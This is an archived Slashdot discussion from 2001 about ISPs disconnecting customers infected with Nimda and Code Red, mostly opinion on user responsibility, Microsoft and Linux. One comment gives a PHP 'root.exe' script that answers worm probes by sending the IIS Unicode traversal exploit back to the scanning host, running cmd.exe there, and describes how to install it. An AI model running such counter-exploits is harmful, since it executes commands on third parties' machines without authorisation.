My ISP (Blueyonder.co.uk) is pretty rough in a lot of areas. However, they were one of the first (when Code Red was running) to come to the decision to pull the plug. They sent an email to all users saying Code Red (and now Nimda) were in the wild. They explained how it propogated, and sent a set of links in the email to the patches, and sites for further info.
They then warned strongly that the connection would be severed if the machines were found to be infected within a couple of days.
Lo and behold, 2 days later, several connections were severed. However, the info email let a lot of people prepare for the event. If it wasn't patched by then, it was a case of either someone was away (in which case wouldn't miss the connection), or didn't know how to work through the patch. In which case, they were forced to call tech support, who would then give them great service on how to cure the ills.
I think pulling the plug on home users while they're infected is a great move. It saves bandwidth, and helps everyone have a better time. And they may also be responsible for helping prevent further infection, saving more people's time and money.
It's just a case of training. A gentle tap to say "No, this is naughty" is fair. It's no draconian act. And more than just "Seeming reasonable", I consider it both reasonable and fair.

Malk

Re:Arbitrary Decisions

[Telek]

I pay for DSL, i can run *WHATEVER* i want on it.

bull... what company do you go by that doesn't have a hugeass EULA?

And keep in mine that EULAs and any sort of contract is 98% CYA... It's there with tonnes of clauses that you will violate every day but are there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why noone reads the EULAs on software, they just click "yeah I agree lets get on with it". The EULAs are there so if you do something annoying, they can nail you for it.

NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS

SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be resonable TOSs, and when there isn't, that's where the goverment is supposed to step in to limit what they can do.

I think that you're going a little haywire thou with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards MPAA or RIAA.

Re:Arbitrary Decisions

[4iedBandit]

NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS. Hello? Are we living on the same planet? We're talking about a virus that aggressivly scans the net and attempts to replicate itself. This virus sucks up bandwidth which is not, despite one /.er statement to the contrary, plentiful. Those who aren't yet infected are at risk of infection, or at the very minimum a DoS attack from those who are infected. To equate running an infected server to Freedom of Speech is ludicrous. To extend your analogy, by allowing infected customers to soak up bandwidth and DoS attack other customers (even if it is unknowingly), you are actively denying the rights of the uninfected customers. Now you have a decision to make; cut off those who are aiding the attacks, or cut off those who are not. Why should my system be removed from the net if it isn't doing anything harmful? If your system is spamming mine at such a ferocious rate that I can't serve legitimate traffic then you are denying me the service I have paid for. At this point your right to service ends, even if you are paying for your own connection. In the US we have freedom of speech, but that dosen't mean we can spread outright lies about others. We have the right to keep and bear arms, but that doesn't give us the right to shoot others indescriminately. Your rights end where others rights begin. And finally, access to the net is not a right. It is not garenteed in the Constitution. It's a service and a privilege that we pay to use. Can it facilitate free speech? Sure. Is it the sole medium for free speech? No. Like any other service if you abuse it you can, and should, be denied access. In the same manor in which you can have your drivers license revoked for abusing the privilage of driving.

Stupid Microserfs!!!

[BroadbandBradley]

They want to run this stupid MS Windoze OS, likely it's pirated anyhow(ever met someone who BOUGHT windows? I haven't), and then they're also too cheap to keep up with paying for Virus software to keep their ShitBox running. If everybody was forced to PAY for windoze, and then they had to go out and BUY additional software so windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! the anti-piracy feature will surely get many to leave the darkside and join us in our quest for world domination. Shut them down and report them to the link below for Piracy from MS.

Re:Stupid Microserfs!!!

[malkavian]

Hey, I bought just about every version of windows out.
There again, I make money from supporting it from time to time (or used to, I now work happily in a Linux shop, running 50 odd Debian servers flat out around the world).
Just knowing how to play with Windows and install/maintain is worth good money in times of hardship, and well worth the price I pay (I run it through my books, and get it deducted from tax anyway).
So, now you've met someone who buys Windows.
Make you any happier?? :)

Malk

Re:Stupid Microserfs!!!

[dasunt]

Slow down, trollboy. Just because you don't know anyone who has bought a licensed version of windows doesn't mean nobody has. Its like me denying the existance of elephants because I've never seen one.

Now take a deep breath, and repeat after me: "Linux is not the solution to every problem." There, that better? Oh, wait, you don't believe me? Here, let me show you a glimps into an alternative world where Microsoft runs GPL code and the Linux distros are for-profit companies.

Slashdot - Alternative World Posting.

Yet another linux worm has been found today, this one, like many others, primarily being spread by people with 2 or 3 year old distro versions, who are too lazy to patch their systems, or have pirated their versions and don't have any official support. Some of these people don't even know that they are running web servers, and most of them have improperly configured firewalls or none at all. Unfortunately, if these poor people could just run windows, with its easy "Windows Update", and a nice, simple graphical installation tool that can detect most hardware, and has 3rd party support for almost all hardware, the world would be a better place.

Get the point? Consider nimda a vulnerability that affects unpatched machines that are often configured with additional services that the user doesn't need. The only reason why windows was the platform targetted and not linux is that windows is the dominate end-user OS. Linux wouldn't solve anything.

OTOH, I paid for my copy of win98SE, and have an option to install a licensed copy of win2k from work. The software I use on the win32 platform is primarily free, such as TinyFirewall, VNC, Putty and Openoffice. My system has the latest patches, and the firewall is (hopefully) properly configured. ;) I haven't had to buy additional software so that windows would continue to run.

The systems we sell at work all include a licensed copy of win**, and come complete with the latest, updated version of an anti-virus software package. The subscription for updates runs for a year, and then, IIRC, is renewable for another year for just $3.65. Even without using anti-virus software for over 3 years, I've never had a virus (I later installed a copy of antivirus software when I had to xfer files from work to home - better safe then sorry, especially when some files are from customers who might be infected).

So, anyways, the purpose of this post is (a) any unpatched, misconfigured system is open to viruses and worms, (b) windows doesn't require thousands of dollars of software to be usable, (c) people do pay for windows, and (d) viruses, for the average informed windows user is not a threat.

Just my $.02

Re:Stupid Microserfs!!!

[BroadbandBradley]

word up!!!

F.M.S.
I buy the distros, even though I am on Cable and can download them free.

That's better than the other alternatives

[CaptJay]

There are three feasible alternatives which high-speed ISPs could take that I can see:

- Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.

- Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).

- Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so much problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.

I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.

Do Workstations Scan too?

[NetJunkie]

When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?

Re:Do Workstations Scan too?

[popeyethesailor]

It infects through the Shared drives..Copies itself to any available open shares on the Network.. 3 infection paths 1) Unpatched webservers 2) Emails 3)Shared drives.. Checkout Symantec's page [symantec.com]for more details.

my company does the same thing...

[uberbastard]

i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.

however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.

i give up.

I think that's exactly the right thing to do

[uriyan]

Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.

A person who runs a web server has to defend himself fromm all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it all but then what can protect him from wet slopes in stormy weather?

Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.

I live in Israel. In the last few days I've been getting quite a lot of internal ISP trafic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.

Monthly Subscriptions?

[Captain_Frisk]

Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
Taco,
I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. Its the users who have the problem. Not that MS is blameless, but calm down before you flame.

I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.

If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at seecolon.org would be laughing it up, whining about how Linus doesn't do enough QA, even though its the users fault.

As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.

Anyway, thats enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.

Captain_Frisk

Bullshit.

[supabeast!]

"Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."

1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.

2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!

hey, this was exactly what I said yesterday!

[TheGratefulNet]

yesterday, I posted a slashdot comment [slashdot.org] that said exactly this.

give credit where credit is due, please.

The SirCam experience and confusing help

[Midnight Thunder]

The other day I received an e-mail from a relation of mine which was the SirCam virus in all it glory. Luckily for me I don't use or Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing they came back to me telling me dispite getting the latest anti-virus update nothing could be detected.

Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.

So here is the problem, what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed infected computers are going to stay infected long after the fix is available.

Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.

My Script to warn infected users

[tommyServ0]

I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
/* URL-encode the message... */
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
/* ...and send it */
fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
fclose ($fp);
}

/* for fun and confusion.. */
header ("HTTP/1.0 404");

echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");

$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?

Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimba.log.

Re:

[account_deleted]

Comment removed based on user account deletion

Speakeasy's going to do the same thing

[Greyfox]

I got an E-mail from Speakeasy yesterday stating that anyone infected with Nimbda will be cut off on the 23rd. Bummer for the Windows users. Now some ranting. The more sensitive members of the audience might want to turn away now...

I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.

And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm start spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too and if he's not doing his job well, his bonus and possibly his job should be impacted.

Re:Firewall

[DrSkwid]

what, like this one [linksys.com]

but what use is a firewall against this?

If you are running IIS as your webserver you let port 80 through the firewall and into IIS and thus expose yourself.

Re:Firewall

[JatTDB]

It takes care of the thousands running IIS without meaning to, those people who didn't really notice the checked box while they were installing WinNT/2K. Increases the likelihood that someone who has a world-accessible webserver *knows* they have a world-accessible webserver, cause they had to expressly do something to make it happen.

Re:W2K/NT4 with IIS

[JatTDB]

There's a lot of damn stupid people in the world...heck, I've met several people who run NT or 2K Server at home...I ask them why...they say "it's more powerful!" I'm reminded of those moments in Baseketball when the evil rich guy, when confronted with an example of supreme stupidity, holds his hands to his head as if in great pain.

Heck, I've even met people who are convince that, to do simple SMB filesharing, you *have* to have Server, workstation "can't do it". Total BS, but when has that ever stopped anyone believing something.

Re:W2K/NT4 with IIS

[JatTDB]

I haven't done it myself, but I seem to remember reading somewhere that a particular version of Samba was the first to introduce domain controller functionality.

Actually, here's some info on that: http://bioserve.latrobe.edu.au/samba/ntdomfaq.html

I should try this out sometime...it would make the Windows boxes on the home network play a little nicer, I think...don't particularly want to waste a box with NT or 2K Server, but I've already got a handful of boxes running Samba...might as well use them to their full potential.

Re:W2K/NT4 with IIS

[JatTDB]

Heh...it's definitely on the list of "things I'm gonna do on a weekend when I'm bored and don't feel like playing games". Just like building a PC for mp3 stereo/DivX player functionality, and getting a few more serial terminals (bathroom, bedroom, and kitchen need terminals, damnit! Screw "internet appliances" and crap like that...I want to always be less than 5 feet from a green-screen!).

That's right, I have no life....why do you ask?

Re:I think it's stupid

[PigleT]

"many hi-speed companies ACTIVELY DISCOURAGE YOU from setting up your own firewall"

Mine didn't. Mine provided pointers to Zone Alarm for windoze users and said that security was the user's own problem in the nice little handbook they gave me. Then again, mine's in the UK so doesn't have to pander to the Great Unwashed just yet..

(Of course, it doesn't help that the guy they sent round to install it saw `zsh, spodzone 18:03 #' and asked `is that windows 2k then?', but at least it left me free to do the obvious with dhcp instead :)

Re:I think it's stupid

[malkavian]

Heh, my ISP is in the UK too..
When the Engineer came round to set up my Cable install, he told me I needed a Windows installation (after I told him that this was Linux, not a prettified windows) to set up the cable modem. When it came down to me having to pull a full tower case into a small room from another room in the flat, he asked if there was any way to just get a browser on the Linux box. So up came Mozilla, and he was just blown away with how easy it was to run. I left him tooling round on X for a while, and maybe we got a convert out of that. :) He took away an ISO of Red Hat, and one of FreeBSD for when he was feeling a tad more adventurous. :)

Malk

Re:I think it's stupid

[chill]

My ISP (Road Runner) suggested it verbally and pointed out in the TOS they also recommend one for users.

Re:Yet Another Linux Bigot (YALB)

[aallan]

Turning off people's connection is rude. Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.

Why? Internet access isn't a right, just like (despite what your average American might think) driving a car is not a right. If you want access to the internet (a peer to peer network) its your problem to make sure you don't have a broken setup that will annoy people. In other words your part of the bargin is not to do anything that will break the network, its your responsibility. Having a broken web server that gets infected by the latest worm is breaking the bargin.

Al.

Re:Yet Another Linux Bigot (YALB)

[jht]

I _have_ been doing something to help people who "just want a PC" and don't have the wherewithal to to deal with constant security threats, patches, and attacks:

I'm setting them all up with Macs.

For all the (often justified) grief that Apple gets for their pricing, a low-end iMac is a nice home PC with a lot of functionality, a good software bundle, and MacOS 9.x is all but hack-proof.

It solves the home user problem nicely.

Re:Yet Another Linux Bigot (YALB)

[PigleT]

Bollocks.

If you get cracked, it's through your own silly fault. If that's because you believed M$loth and/or got the impression that installing software was a zero-maintenance task, you deserve what you get.

And don't try to play the 75-yo sympathy game, either, the rules are just the same: you get your box cracked, you're responsible for it scanning & spreading to other sites, end of story.

Re:Yet Another Linux Bigot (YALB)

[GreyPoopon]

Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.

Oh, that's just pathetic.... You would only use the "but what about the elderly and the children" argument to drum up emotion when you have no other logical argument. To respond in kind, what about the other 75 year old senior citizens who have a clean computer and can't read web pages or send mail to their grandkids because the network is so flooded that they can't get anything through. Do you think they'll understand why this "dang new-fangled contraption ain't workin'?"

I'm not a cold-hearted person, but you've got to look at the facts. Shutting down these connections is pretty much the only way to make sure people will clean up their machines. You can't forget that the Code Red II virus, and presumably nimda as well, opens up a nice little hole that can be used to turn your machine into a Zombie. If the zombies get used, an ISP will have machines on their network attacking corporate and government computer systems. That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.

The best idea I've seen yet is the one to set up a "private" network for the infecting machines and direct them there. For those ISP's that don't want that expense, maybe offering to send them a CD with the patches and instructions in the mail for a reasonable fee would be a better alternative.

Re:Yet Another Linux Bigot (YALB)

[sigwinch]

That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.

The legal liability is minimal, since transport sellers have no statutory responsibility to be friendly. The world is *full* of cracked boxes that ISPs ignore because the compromisers aren't spewing lots of packets and the box owners keep paying. The real constraints for a massive worm like Nimda are providing an acceptable quality of service to customers, and minimizing upstream bandwidth costs. There simply isn't any money in having one third of your customers spray random packets as fast as they can.

Re:Yet Another Linux Bigot (YALB)

[quakeaddict]

Yeah you really know the score about NIMDA dont you.

You can get Nimda about seven different ways and 6 of them have nothing to do with running a web server. Just browsing an infected site, something beyond your control, with IE 5.5 sp1 or less was enough.

Re:Yet Another Linux Bigot (YALB)

[NetJunkie]

Getting it from a site won't make your system start broadcasting out for other sites. That ONLY happens when an IIS box gets infected.

So no one would care if your non-IIS workstation was infected...the only person with the problem would be you.

Re:Yet Another Linux Bigot (YALB)

[Simon Brooke]

You can get Nimda about seven different ways and 6 of them have nothing to do with running a web server. Just browsing an infected site, something beyond your control, with IE 5.5 sp1 or less was enough.

This is true, of course. This worm spreads in a number of ways, all of which exploit security flaws in Microsoft software:

• It can directly attack your computer if you are running Microsoft Internet Information Server (IIS)
  • Consider using Apache [apache.org] instead
• It can attack as a mail attachment if you are using Microsoft Outlook as a mail client
  • Consider using Pegasus [pmail.com] instead
  • Consider using Netscape 6 [netscape.com] instead
  • Consider using KMail [kde.org] (on UNIX/Linux) instead.
• It can attack as an executable attachment to a Web page if you browse with Microsoft Internet Explorer
  • Consider using Opera [opera.com] instead.
  • Consider using Mozilla [mozilla.org] instead.
  • Consider using Netscape 6 [netscape.com] instead.
  • Consider using Konqueror [konqueror.org] (on UNIX/Linux) instead.

Notice a pattern there? Yes, that's right. If you don't run Microsoft, you can't get Nimda. Or Code Red, or Code Red II, or SirCam, or Melissa, or...

This isn't about being a Linux bigot. You can't get Nimda on MacOS. You can't get it on Solaris. You can't get in on OS/400, or AIX, or an Amiga, or on *BSD. This isn't a matter of Linux being good. Linux is just ordinary, like any other half-competent operating system.

This is a matter of Microsoft being incompetent. Hopelessly, culpably, irredeemably incompetent.

Re:Yet Another Linux Bigot (YALB)

[quakeaddict]

If you knew anything about Nimda you would realize that you can get infected from simply reading an e-mail using an older version of Outlook, or browsing a web page using an older (but not that old) version of IE.

How do you get in touch with people??

[Bilbo]

> But I agree too, helping these people out would be nice.

Well DUH! Helping people is really nice, but if you'd read the article, the point is that the ISP's haven't been able to get in touch with people! The intent here is NOT to slap people around for being stupid, but to get their attention!! This sh-t has been going on for months now. I say it's about time the ISP's get proactive and start forcing people to wake up and clean up their systems!!!

Re:Agreed.

[budgenator]

These infected computers should be cleanned, in a few hours I'm going to clean my boss's puter.

1. format c:
2. ask do you realy want me to reload Windows ® ?

Seriously with the FBI et al up to their kiesters running carnivore and echelon stuff do we realy want to let the ignorant clog up the net with malicious traffic? Just that much more traffic for them to sort through before they let our ligit traffic pass. We can piss and moan about civil liberties all we want, but the powers that be are going to do everything in their power to get the terrs, and letting them send out diversonary traffic isn't going to help. I just hope what they're doing doesnt get so illegal that they blow thier case out of the water.

Actualy I'm suprised, this is the first thing I've seen on the web, that has mentioned sept 11 and viri ect. that has stayed up for more than a few seconds anyways.

Re:Since Taco's infinitely wise...

[chill]

Sorry. Apache is more prevalent than IIS.

Remember Code Blue a week or so ago? The one that affected Apache/Unix users? The media called it the "Code Red" of the Unix world. What happened with it? Nothing. Most systems were secured against it by default.

Nimbda affected more systems in 10 minutes than Code Blue did in the past week.

Blaming people won't solve the problem

[(void*)]

In this time of knee-jerk reactions to terrifying disasters, this warning seems richly appropriate.

Re:Blaming people won't solve the problem

[(void*)]

Well, finding fault for the purposes of learning from lessons, for the purpose of correcting future errors is fine. But finding fault with an axe to grind seems pathetically childish. To bring everyting back into perspective, CmdrTaco has said "shut them down and make the users aware of the problem - let us worry about user rights later, at a more appropriate time". That sounds like a great reasonaed advice. Going around yelling "MS is at fault, MS is at fault" ignores the fact that the user may have valid reasons to install IIS, and perhaps is unaware of all that entails. Must as I do agree that MS software is shoddy, I must say that this game of "blaming people" is inappropriate, right now.

Re:Speakeasy is following suit.

[Zaknafein500]

Great email. I'm glad providers are finally taking a stand. If these machines have still not been patched after 2 months of publicity, they never will. The only way you are going to get it done is to kick these people off the net until they do it. It takes some balls to do this, as these idiots are also the type who will call and throw a huge fit claiming that their machines are perfectly fine. I wouldn't want to be in customer service, but I'm glad their doing it for the betterment of the net.

Re:Most of them deserve it: They are pirates!

[YKnot]

Nimda uses several attack vectors and not all of them involve an IIS. A machine infected by Nimda isn't necessarily running Win2K Server.

Re:Most of them deserve it: They are pirates!

[malkavian]

Ok.. So the Microsoft huge sales figures come from where?
Most of these people ARE likely to be legit users of IIS.
Unless you're a tech in the company in question, you'll never have access to the install disks (those, usually being locked in fireproof cabs, or held in the technical offices for most places I've worked).
Therefore, if it was a tech 'borrowing and installing' IIS for home use (DSL), they'd be much more likely to keep it patched, and know how to when they recieve the email. And a lot more likely to be checking.
This does reek of a home user who has no clue that it's installed, or how to remedy the problem.

Malk

Roadrunner MAY be doing the same thing

[Bilbo]

I know I sent in a letter to the Roadrunner support address suggesting that they start shutting off the connections on infected systems, and even sent them a list of the IP addresses out of my logs. I haven't received any reply to my email, but I have noticed a sudden drop today in the number of hits my server has been logging!

(It's clear that they haven't completely shut down the ports, since I'm still able to connect to my server, but I've only got errors from a few unique IP addresses today. There's no way that many people could have cleaned up their own systems since yesterday...)

Re:MD5 your antiviral mail

[ichimunki]

Considering that the McAfee software is only going to remove known threats, it would be better to perform a data backup and reinstall the system software on an infected host-- who knows if McAfee missed something in the clean up? Better to get a clean copy running than a patched version of an infected copy, and then, before you put the clean system back on line, you take the necessary steps to prevent getting infected (like turning off IIS) while you obtain patches for the vulnerable services. Considering that these are residential accounts, there is no revenue to be lost from server downtime, right? And the host owner should take his/her time to do the job right.